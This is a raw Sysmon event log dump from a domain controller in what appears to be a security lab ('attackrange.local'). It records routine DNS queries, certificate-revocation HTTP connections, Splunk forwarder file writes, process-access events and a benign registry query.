12:01:33.625{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63682- 354300x80000000000000003624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.598{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58080-false184.25.50.179a184-25-50-179.deploy.static.akamaitechnologies.com80http 354300x80000000000000003623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.591{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62503- 354300x80000000000000003622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.498{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58079-false151.139.128.14-80http 354300x80000000000000003621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.494{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62974- 354300x80000000000000003620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.482{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58078-false151.139.128.14-80http 354300x80000000000000003619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:33.479{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55422- 23542300x80000000000000003641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:37.971{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F286E52C3FAB5F26FE9F1C6B26544385,SHA256=64682E5C575BBFD0C6959871647125CFE17A92B63CCE100FBDFBA4FE3E2F39C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.277{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58085-false23.37.43.27a23-37-43-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000003639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.260{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58084-false23.37.43.27a23-37-43-27.deploy.static.akamaitechnologies.com80http 354300x80000000000000003638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58483- 354300x80000000000000003637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.228{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local58083-false93.184.220.29-80http 354300x80000000000000003636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:34.949{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57459- 23542300x80000000000000003635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:37.127{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE79EFC4ECA9885F57D10B0229F4E1F5,SHA256=F09438DC46CEAF8260E148B329CCE5CAC51D3B97D7685BADCF4D461EACC12C5A,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000003634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.282{266CAFBE-647D-6064-3400-00000000AE01}2760sv.symcd.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000003633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.265{266CAFBE-647D-6064-3400-00000000AE01}2760s2.symcb.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000003632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:35.220{266CAFBE-647D-6064-3400-00000000AE01}2760sv.symcb.com0type: 5 crl-symcprod.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 354300x80000000000000003642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:37.106{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56180- 23542300x80000000000000003643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:40.205{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\DeviceMetadataCache\OLDCACHE.000MD5=9122C454A375CA024465FF3ABE4787B4,SHA256=C2346D518E0E6BAAC4D14FD68318E8E544E5EF5C6F79ABC5579D43EC6A8C9B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:41.221{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=72254F55CF93AFBB1C6AABEF241CFE28,SHA256=00516D08AB5AA350731E72EFC6C058059A6E2D52510155D0CFC636B70156678C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:41.221{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2D294D857276DE30451BDB40A66349EC,SHA256=197E141F597DF4E503C977D6CF94C425BC680EAF2765EA6E7A72C23A8817C9BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:43.346{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4EC7ADD60351DAF42239B37CA664EF4,SHA256=391BA49BC5DEE97EBEBD1F661C9B565F5A2F724231054851661FC7ADF2A54F95,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000003648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:44.767{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x80000000000000003647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:44.424{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FB98456422EBDE6D12EBED7CD999FE7,SHA256=91543B4F7DC64804CCEFA52143F21F28990121763E1891625DF32031F2515F98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:45.580{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BDFB310ADB96C44FA7384D645C1D01,SHA256=CA6CE11541B4234453A4770444787D4587E570597A9194212EB9919BC7F1001F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.658{266CAFBE-64AA-6064-8B00-00000000AE01}2340NT AUTHORITY\SYSTEMC:\Windows\system32\cmd.exeC:\Windows\Temp\silconfig.logMD5=30F10BDF2397EE813AD110C4C67DA9C9,SHA256=AEDC0F097B888E0EB90F40157351396D418B7A8A82A2C69BD82FEB6DBD12BC83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-64AA-6064-8C00-00000000AE01}44163324C:\Windows\system32\conhost.exe{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-64AA-6064-8D00-00000000AE01}49484064C:\Windows\system32\cmd.exe{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.635{266CAFBE-64AA-6064-8E00-00000000AE01}4412C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000003677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-64AA-6064-8C00-00000000AE01}44163324C:\Windows\system32\conhost.exe{266CAFBE-64AA-6064-8D00-00000000AE01}4948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:46.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 